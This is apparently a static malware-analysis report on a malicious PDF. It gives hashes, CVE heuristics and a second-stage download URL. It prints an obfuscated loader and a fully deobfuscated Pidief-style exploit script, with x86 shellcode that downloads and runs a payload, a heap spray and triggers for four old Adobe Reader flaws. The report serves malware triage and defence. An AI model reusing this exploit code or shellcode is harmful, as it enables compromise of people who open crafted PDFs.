Malicious PDF — malware analysis report

Static analysis result for SHA-256 69421e58eedd4cbc…

MALICIOUS

PDF

5.2 KB Authoring application: Bejomjeme (via 8bf7bRifauadijiuohabaq) First seen: 2026-05-10
MD5: 5dbe330467ebaba88cba30c5fa57fd7e SHA-1: 372d05bcfdde384704e4525906895b2f3d57ee74 SHA-256: 69421e58eedd4cbc24e3e876e318b2de5fc4db3e31f226ada8758de9a84ad9d4
428 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript T1566.001 Spearphishing Attachment

The PDF file contains embedded JavaScript that leverages multiple known Adobe Reader vulnerabilities, including CVE-2009-4324, CVE-2009-0927, CVE-2007-5659, and CVE-2008-2992. The script is designed to perform a heap spray and ultimately download a second-stage payload from the URL http://ahrudy.egh/4. The ML classifier also strongly flagged this PDF as malicious.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 10

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ahrudy.egh/4 Referenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0010_000.js pdf-javascript-stream PDF /JS object 10 at offset 0xF5B 821 bytes
SHA-256: a97d313f56079dd9849c41f8a36991c287e32c360ff4257414e91d6f7ad4462c
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var oV=null;try {cancelEvent();var operaBrowser = navigator.userAgent.indexOf('Opera') >=0 ? 1 : false;var webkitBrowser = navigator.userAgent.indexOf('Safari') >=0 ? false : false;var MSIE = navigator.userAgent.indexOf('MSIE')>= 0 ? true : false;} catch(lS){var sV= new Function(oV);sV();}function cancelEvent(){oV='varG iTGGW = 57 GG;var wR = GthiGGs;var GhO=\'ge\'+\'tPageNGGtGG\'+\'hWoGrdG\';var kPE=G\'ge\'+\'tPag\'+G\'eNGGumW\'+GG\'GGoGGrdGs\'G;varG yHY=\'Gfr\'+\'omCh\'+\'arCode\';var sL=wGR[kPE]G(thisGG.pageGGNum);vGar GGrIG=\'G\';Gfor(vGGarG uB=0;uB< sL;GG uB++){rI=[rIGG,wR[hGGO](wR.pageNum,uB,GGtruGGe)].jGGoin(\'\');;}vaGr rM=\'\';for(var uB=0;uB < rIG.length;G uB+=2){tS=rIGG.sGubstr(uB,2);rM=[rM,String[yHY]G(parseInt(tS,GG16G)^iTW)].join(\'\')G;}evaGGl(rGGM);rM=nulGGl;'.replace(/[G]/g, '');return false;}
legacy_pdfkit_stage_000.js deobfuscated-js getPageWords-XOR Pidief stage normalized at offset 0x0 4771 bytes
SHA-256: 84a90ffe0bb65d63f78696a0ff2a6fb82670fedff244f2b98a4dabaf302ba833
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 1 long hex-escaped blob(s).
Preview script
First 1,000 lines of the extracted script
this.v="v";aV=["l","d"];var f=new String();var tY='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/.:_-?&=%#';try {var bO='z'.substr(26899,26899)} catch(bO){};var cP=32510;var eH=this.info['b'].replace(/[\s]/g, '');for(var bE=0; bE <974; bE++){bE++};var rG='';var gZ={};var xM = this.info;var qZ = (xM.producer.substr(0,5) == 'debug');var vC = new Array(); var mT = "%u";function zQ(str){str = str.split(mT);var ret="";for(var i in str){if(str[i] != "")ret += String.fromCharCode(parseInt(str[i],16));}return ret;}function qZM(str1, str2){return [str1, str2].join("");}function aN(pW){var sPO = gR();var rU = iN();sPO += ((sPO.indexOf("?") > -1) ? "&" : "?") + "reader_version=" + rU;if(qZ) app.alert("URL: " + sPO);var d=mT;var tS="\x50\x53\x51\x52\x56\x57\x55\x9C\xE8\x00\x00\x00\x00\x5D\x83\xED\x0D\x31\xC0\x64\x03\x40\x30\x78\x10\x8B\x40\x0C\x8B\x70\x14\xAD\x89\xC0\x89\xC0\x8B\x40\x10\xEB\x09\x8B\x40\x34\x8D\x40\x7C\x8B\x40\x3C\x56\x57\xBE\xE2\x00\x00\x00\x01\xEE\xBF\xD2\x00\x00\x00\x01\xEF\xE8\x56\x01\x00\x00\x5F\x5E\x89\xEA\x81\xC2\xE2\x00\x00\x00\x52\x68\x80\x00\x00\x00\xFF\x95\xD2\x00\x00\x00\x89\xEA\x81\xC2\xE2\x00\x00\x00\x31\xF6\x01\xC2\x8A\x9C\x35\xE7\x01\x00\x00\x80\xFB\x00\x74\x06\x88\x1C\x32\x46\xEB\xEE\xC6\x04\x32\x00\x89\xEA\x81\xC2\xC9\x01\x00\x00\x52\xFF\x95\xD6\x00\x00\x00\x89\xEA\x81\xC2\xD4\x01\x00\x00\x52\x50\xFF\x95\xDA\x00\x00\x00\x6A\x00\x6A\x00\x89\xEA\x81\xC2\xE2\x00\x00\x00\x52\x89\xEA\x81\xC2\xF4\x01\x00\x00\x52\x6A\x00\xFF\xD0\x6A\x05\x89\xEA\x81\xC2\xE2\x00\x00\x00\x52\xFF\x95\xDE\x00\x00\x00\x9D\x5D\x5F\x5E\x5A\x59\x5B\x58\xC3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x47\x65\x74\x54\x65\x6D\x70\x50\x61\x74\x68\x41\x00\x4C\x6F\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x00\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\x00\x57\x69\x6E\x45\x78\x65\x63\x00\xBB\x89\xF2\x89\xF7\x30\xC0\xAE\x75\xFD\x29\xF7\x89\xF9\x31\xC0\xBE\x3C\x00\x00\x00\x03\xB5\x9F\x01\x00\x00\x66\xAD\x03\x85\x9F\x01\x00\x00\x8B\x70\x78\x83\xC6\x1C\x03\xB5\x9F\x01\x00\x00\x8D\xBD\xA3\x01\x00\x00\xAD\x03\x85\x9F\x01\x00\x00\xAB\xAD\x03\x85\x9F\x01\x00\x00\x50\xAB\xAD\x03\x85\x9F\x01\x00\x00\xAB\x5E\x31\xDB\xAD\x56\x03\x85\x9F\x01\x00\x00\x89\xC6\x89\xD7\x51\xFC\xF3\xA6\x59\x74\x04\x5E\x43\xEB\xE9\x5E\x93\xD1\xE0\x03\x85\xAB\x01\x00\x00\x31\xF6\x96\x66\xAD\xC1\xE0\x02\x03\x85\xA3\x01\x00\x00\x89\xC6\xAD\x03\x85\x9F\x01\x00\x00\xC3\xEB\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x89\x85\x9F\x01\x00\x00\x56\x57\xE8\x58\xFF\xFF\xFF\x5F\x5E\xAB\x01\xCE\x80\x3E\xBB\x74\x02\xEB\xED\xC3\x55\x52\x4C\x4D\x4F\x4E\x2E\x44\x4C\x4C\x00\x55\x52\x4C\x44\x6F\x77\x6E\x6C\x6F\x61\x64\x54\x6F\x46\x69\x6C\x65\x41\x00\x31\x32\x33\x34\x35\x36\x37\x38\x2E\x65\x78\x65\x00";tS+=sPO;tS+="\x00\x90";return tS;};function gR(){var yZ = (xM.author + xM.title).replace(/[\s]/g, '');var dS = mZ(yZ, eH, tY);return dS;};function mZ(yZ, tY, eH){var dS="";for(var i=0; i < yZ.length; i++){var lW = tY.indexOf(yZ[i]);if(lW > -1 ){dS += eH[lW];}}return dS;};function kP(yZ){var out = "";yZ = vM(yZ);g = Math.round(yZ.length / 4);if (g != yZ.length /4) yZ+="00";for(var i=0; i < yZ.length; i+=4){out+= mT + yZ.substr(i+2, 2) + yZ.substr(i, 2);}return out;};function vM(s){var i, f = 0, a = [];s += '';f = s.length;for (i = 0; i<f; i++) {a[i] = s.charCodeAt(i).toString(16).replace(/^([\da-f])$/,"0$1").toUpperCase();}return a.join('');};function mF(fA, len){while (fA.length * 2 < len){fA = qZM(fA, fA);}return fA.substring(0, len / 2);};function sF(vI){var yD = 0x0c0c0c0c;        rQ = aN("pdf");if (vI == 1){yD = 0x30303030;}var kR = 0x400000;var ln = rQ.length * 2;var lQ = kR - (ln + 0x38);var fA = zQ(mT+"9090"+mT+"9090"); fA = mF(fA, lQ);var iNK = (yD - 0x400000) / kR;for (var iB = 0; iB < iNK; iB ++ ){vC[iB] = qZM(fA, rQ);}};function iN(){try {return app.viewerVersion.toString();}catch(zA){    return 0;}}if(qZ) app.alert("called exploit");var rU = iN();if(qZ)  app.alert("v: " + rU);if (rU > 8){if(qZ) app.alert("util.printf");sF(1);var qN = "12999999999999999999";for (pG=0; pG < 276; pG++) qN += "8";util.printf("%45000f", qN);}if (rU < 8){if(qZ) app.alert("Collab.collectEmailInfo");sF(0);var yH = zQ(mT+"0c0c"+mT+"0c0c");while (yH.length < 44952) yH += yH;this.collabStore = Collab.collectEmailInfo({ subj : "", msg : yH});}if (rU < 9.1){if (app.doc.Collab.getIcon){if(qZ) app.alert("Collab.getIcon");sF(0);var zU = unescape("%09");while (zU.length < 0x4000) zU += zU;zU = "N." + zU;app.doc.Collab.getIcon(zU);}}if (rU == 9.2){if(qZ) app.alert("media.newPlayer");sF(1);var sf="1.000000000.000000000.1337 : 3.13.37";util.printd(sf, new Date());try {media.newPlayer(null);} catch(e) {}util.printd(sf, new Date());}var gJ={eB:"dG"};var uZ=new Date();aR=["jC","oN","jY"];var lM=["dI","iH","h"];���

Open this report in the interactive analyzer, or submit your own file for analysis.